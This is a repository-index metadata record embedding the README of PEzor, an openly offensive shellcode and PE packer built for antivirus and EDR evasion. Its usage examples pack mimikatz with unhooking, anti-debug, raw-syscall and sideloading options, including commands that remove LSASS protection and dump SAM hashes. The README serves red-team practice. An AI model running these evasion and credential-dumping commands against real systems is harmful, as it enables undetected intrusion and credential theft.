{"id":13840104,"url":"https://github.com/phra/PEzor","last_synced_at":"2025-07-11T07:32:20.663Z","repository":{"id":37366197,"uuid":"281637859","full_name":"phra/PEzor","owner":"phra","description":"Open-Source Shellcode \u0026 PE Packer","archived":false,"fork":false,"pushed_at":"2024-02-03T19:11:05.000Z","size":227,"stargazers_count":1859,"open_issues_count":8,"forks_count":322,"subscribers_count":42,"default_branch":"master","last_synced_at":"2024-11-21T05:02:41.036Z","etag":null,"topics":["antivirus-evasion","hacktoberfest","redteam","shellcode"],"latest_commit_sha":null,"homepage":"https://iwantmore.pizza/posts/PEzor.html","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/phra.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2020-07-22T09:45:52.000Z","updated_at":"2024-11-20T19:28:40.000Z","dependencies_parsed_at":"2023-02-03T09:31:23.855Z","dependency_job_id":null,"html_url":"https://github.com/phra/PEzor","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phra%2FPEzor","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phra%2FPEzor/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phra%2FPEzor/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/phra%2FPEzor/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/phra","download_url":"https://codeload.github.com/phra/PEzor/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225705217,"owners_count":17511248,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["antivirus-evasion","hacktoberfest","redteam","shellcode"],"created_at":"2024-08-04T17:00:42.001Z","updated_at":"2024-11-21T09:30:56.260Z","avatar_url":"https://github.com/phra.png","language":"C","funding_links":[],"categories":[":package: Packers","C (286)","EDR Evasion Tools and Methods","C"],"sub_categories":["After 2010","Miscellaneous Listeners"],"readme":"PEzor\n=====\n\nRead the blog posts here:\n\n- [https://iwantmore.pizza/posts/PEzor.html](https://iwantmore.pizza/posts/PEzor.html)\n- [https://iwantmore.pizza/posts/PEzor2.html](https://iwantmore.pizza/posts/PEzor2.html)\n- [https://iwantmore.pizza/posts/PEzor3.html](https://iwantmore.pizza/posts/PEzor3.html)\n- [https://iwantmore.pizza/posts/PEzor4.html](https://iwantmore.pizza/posts/PEzor4.html)\n\n```raw\n ________________\n\u003c PEzor!! v3.3.0 \u003e\n ----------------\n      \\                    / \\  //\\\n       \\    |\\___/|      /   \\//  \\\\\n            /0  0  \\__  /    //  | \\ \\\n           /     /  \\/_/    //   |  \\  \\\n           @_^_@'/   \\/_   //    |   \\   \\\n           //_^_/     \\/_ //     |    \\    \\\n        ( //) |        \\///      |     \\     \\\n      ( / /) _|_ /   )  //       |      \\     _\\\n    ( // /) '/,_ _ _/  ( ; -.    |    _ _\\.-~        .-~~~^-.\n  (( / / )) ,-{        _      `-.|.-~-.           .~         `.\n (( // / ))  '/\\      /                 ~-. _ .-~      .-~^-.  \\\n (( /// ))      `.   {            }                   /      \\  \\\n  (( / ))     .----~-.\\        \\-'                 .~         \\  `. \\^-.\n             ///.----..\u003e        \\             _ -~             `.  ^-`  ^-_\n               ///-._ _ _ _ _ _ _}^ - - - - ~                     ~-- ,.-~\n                                                                  /.-~\n---------------------------------------------------------------------------\n```\n\n\u003c!-- toc --\u003e\n* [Installation](#installation)\n* [Usage](#usage)\n\u003c!-- tocstop --\u003e\n\n\u003c!-- install --\u003e\n# Installation\nThe `install.sh` is designed to work on a Kali Linux distro.\n```sh-session\n$ git clone https://github.com/phra/PEzor.git\n$ cd PEzor\n$ sudo bash install.sh\n$ bash PEzor.sh -h\n```\n\n# ~Upgrading from v2.x.x~\n\n~The `PATH` variable has to be updated to use a specific commit of [Donut](https://github.com/TheWover/donut)! Check the updated `install.sh` script.~\n\n\u003c!-- installstop --\u003e\n\n\u003c!-- usage --\u003e\n# Usage\n* [`PEzor -h`](#PEzor-help)\n* [`PEzor \u003cEXECUTABLE\u003e [donut args...]`](#PEzor-executable)\n* [`PEzor \u003cSHELLCODE\u003e`](#PEzor-shellcode)\n\u003c!-- usagestop --\u003e\n\n\u003c!-- pezor-help --\u003e\n## `PEzor help`\n\ndisplay help for PEzor\n\n```\nUSAGE\n  $ PEzor help\n```\n\u003c!-- pezor-helpstop --\u003e\n\n\u003c!-- pezor-executable --\u003e\n## `PEzor \u003cEXECUTABLE\u003e`\n\nPack the provided executable into a new one\n\n```\nOPTIONS\n  -h                        Show usage and exits\n  -32                       Force 32-bit executable\n  -64                       Force 64-bit executable\n  -debug                    Generate a debug build\n  -unhook                   User-land hooks removal\n  -antidebug                Add anti-debug checks\n  -syscalls                 Use raw syscalls [64-bit only] [Windows 10 only]\n  -sgn                      Encode the generated shellcode with sgn\n  -text                     Store shellcode in .text section instead of .data\n  -rx                       Allocate RX memory for shellcode\n  -self                     Execute the shellcode in the same thread\n  -sdk=VERSION              Use specified .NET Framework version (2, 4, 4.5 (default))\n  -cleanup                  Perform the cleanup of allocated payload and loaded modules (only for BOFs)\n  -sleep=N                  Sleeps for N seconds before unpacking the shellcode\n  -format=FORMAT            Outputs result in specified FORMAT (exe, dll, reflective-dll, service-exe, service-dll, dotnet, dotnet-createsection, dotnet-pinvoke)\n  -fluctuate=PROTECTION     Fluctuate memory region to PROTECTION (RW or NA) by hooking Sleep()\n  -xorkey=KEY               Encrypt payload with a simple multibyte XOR, it retrieves the key at runtime by using GetComputerNameExA(ComputerNameDnsFullyQualified)\n  [donut args...]           After the executable to pack, you can pass additional Donut args, such as -z 2\n\nEXAMPLES\n  # 64-bit (self-inject RWX)\n  $ PEzor.sh -unhook -antidebug -text -self -sleep=120 mimikatz/x64/mimikatz.exe -z 2\n  # 64-bit (self-inject RX)\n  $ PEzor.sh -unhook -antidebug -text -self -rx -sleep=120 mimikatz/x64/mimikatz.exe -z 2\n  # 64-bit (raw syscalls)\n  $ PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz/x64/mimikatz.exe -z 2\n  # 64-bit (fluctuate to READWRITE when sleeping)\n  $ PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '\"coffee\" \"sleep 5000\" \"coffee\" \"exit\"'\n  # 64-bit (fluctuate to NOACCESS when sleeping)\n  $ PEzor.sh -fluctuate=NA -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '\"coffee\" \"sleep 5000\" \"coffee\" \"exit\"'\n  # 64-bit (use environmental keying with GetComputerNameExA)\n  $ PEzor.sh -xorkey=MY-FQDN-COMPUTER-NAME -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '\"coffee\" \"sleep 5000\" \"coffee\" \"exit\"'\n  # 64-bit (support EXEs with resources by keeping PE headers in memory)\n  $ PEzor.sh -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -k 2 -p '\"!+\" \"!processprotect\" \"/process:lsass.exe\" \"/remove\" \"!-\" \"exit\"'\n  # 64-bit (beacon object file)\n  $ PEzor.sh -format=bof mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\\users\\public\\mimi.out\" \"token::whoami\" \"exit\"'\n  # 64-bit (beacon object file w/ cleanup)\n  $ PEzor.sh -format=bof -cleanup mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\\users\\public\\mimi.out\" \"token::whoami\" \"exit\"'\n  # 64-bit (dll)\n  $ PEzor.sh -format=dll mimikatz/x64/mimikatz.exe -z 2 -p '\\\"log c:\\users\\public\\mimi.out\\\" \\\"token::whoami\\\" \\\"exit\\\"'\n  # 64-bit (dll sideload)\n  $ PEzor.sh -format=dll -dll-sideload=version.dll mimikatz/x64/mimikatz.exe -z 2 -p '\\\"log c:\\users\\public\\mimi.out\\\" \\\"token::whoami\\\" \\\"exit\\\"'\n  # 64-bit (reflective dll)\n  $ PEzor.sh -format=reflective-dll mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\\users\\public\\mimi.out\" \"token::whoami\" \"exit\"'\n  # 64-bit (service exe)\n  $ PEzor.sh -format=service-exe mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\\users\\public\\mimi.out\" \"token::whoami\" \"exit\"'\n  # 64-bit (service dll)\n  $ PEzor.sh -format=service-dll mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\\users\\public\\mimi.out\" \"token::whoami\" \"exit\"'\n  # 64-bit (dotnet)\n  $ PEzor.sh -format=dotnet -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\\users\\public\\mimi.out\" \"token::whoami\" \"exit\"'\n  # 64-bit (dotnet-pinvoke)\n  $ PEzor.sh -format=dotnet-pinvoke -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\\users\\public\\mimi.out\" \"token::whoami\" \"exit\"'\n  # 64-bit (dotnet-createsection)\n  $ PEzor.sh -format=dotnet-createsection -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '\"log c:\\users\\public\\mimi.out\" \"token::whoami\" \"exit\"'\n  # 32-bit (self-inject)\n  $ PEzor.sh -unhook -antidebug -text -self -sleep=120 mimikatz/Win32/mimikatz.exe -z 2\n  # 32-bit (Win32 API: VirtualAlloc/WriteProcessMemory/CreateRemoteThread)\n  $ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 mimikatz/Win32/mimikatz.exe -z 2\n  # 32-bit (Win32 API: VirtualAlloc/WriteProcessMemory/CreateRemoteThread) and arguments for donut\n  $ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 mimikatz/Win32/mimikatz.exe -z 2 \"-plsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv\"\n```\n\u003c!-- pezor-executablestop --\u003e\n\n\u003c!-- pezor-shellcode --\u003e\n## `PEzor \u003cSHELLCODE\u003e`\n\nPack the provided shellcode into an executable\n\n```\nUSAGE\n  $ PEzor \u003c-32|-64\u003e [options...] \u003cSHELLCODE\u003e\n\nOPTIONS\n  -h                        Show usage and exits\n  -32                       Force 32-bit executable\n  -64                       Force 64-bit executable\n  -debug                    Generate a debug build\n  -unhook                   User-land hooks removal\n  -antidebug                Add anti-debug checks\n  -shellcode                Force shellcode detection\n  -syscalls                 Use raw syscalls [64-bit only] [Windows 10 only]\n  -sgn                      Encode the provided shellcode with sgn\n  -text                     Store shellcode in .text section instead of .data\n  -rx                       Allocate RX memory for shellcode\n  -self                     Execute the shellcode in the same thread [requires RX shellcode, not compatible with -sgn]\n  -cleanup                  Perform the cleanup of allocated payload and loaded modules (only for BOFs)\n  -sleep=N                  Sleeps for N seconds before unpacking the shellcode\n  -format=FORMAT            Outputs result in specified FORMAT (exe, dll, reflective-dll, service-exe, service-dll, dotnet, dotnet-createsection, dotnet-pinvoke)\n  -fluctuate=PROTECTION     Fluctuate memory region to PROTECTION (RW or NA) by hooking Sleep()\n  -xorkey=KEY               Encrypt payload with a simple multibyte XOR, it retrieves the key at runtime by using GetComputerNameExA(ComputerNameDnsFullyQualified)\n\nEXAMPLES\n  # 64-bit (self-inject RWX)\n  $ PEzor.sh shellcode.bin\n  # 64-bit (self-inject RX)\n  $ PEzor.sh -unhook -antidebug -text -self -rx -sleep=120 shellcode.bin\n  # 64-bit (self-inject)\n  $ PEzor.sh -unhook -antidebug -text -self -sleep=120 shellcode.bin\n  # 64-bit (raw syscalls)\n  $ PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 shellcode.bin\n  # 64-bit (fluctuate to READWRITE when sleeping)\n  $ PEzor.sh -fluctuate=RW shellcode.bin\n  # 64-bit (fluctuate to NOACCESS when sleeping)\n  $ PEzor.sh -fluctuate=NA shellcode.bin\n  # 64-bit (use environmental keying with GetComputerNameExA)\n  $ PEzor.sh -xorkey=MY-FQDN-MACHINE-NAME shellcode.bin\n  # 64-bit (beacon object file)\n  $ PEzor.sh -format=bof shellcode.bin\n  # 64-bit (beacon object file w/ cleanup)\n  $ PEzor.sh -format=bof -cleanup shellcode.bin\n  # 64-bit (dll)\n  $ PEzor.sh -format=dll shellcode.bin\n  # 64-bit (dll sideload)\n  $ PEzor.sh -format=dll -dll-sideload=version.dll shellcode.bin\n  # 64-bit (reflective dll)\n  $ PEzor.sh -format=reflective-dll shellcode.bin\n  # 64-bit (service exe)\n  $ PEzor.sh -format=service-exe shellcode.bin\n  # 64-bit (service dll)\n  $ PEzor.sh -format=service-dll shellcode.bin\n  # 64-bit (dotnet)\n  $ PEzor.sh -format=dotnet shellcode.bin\n  # 64-bit (dotnet-pinvoke)\n  $ PEzor.sh -format=dotnet-pinvoke shellcode.bin\n  # 64-bit (dotnet-createsection)\n  $ PEzor.sh -format=dotnet-createsection shellcode.bin\n  # 32-bit (self-inject)\n  $ PEzor.sh -unhook -antidebug -text -self -sleep=120 shellcode.bin\n  # 32-bit (Win32 API: VirtualAlloc/WriteProcessMemory/CreateRemoteThread)\n  $ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 shellcode.bin\n```\n\n_See code: [PEzor.sh](https://github.com/phra/PEzor/blob/master/PEzor.sh)_\n\u003c!-- pezor-shellcodestop --\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fphra%2FPEzor","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fphra%2FPEzor","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fphra%2FPEzor/lists"}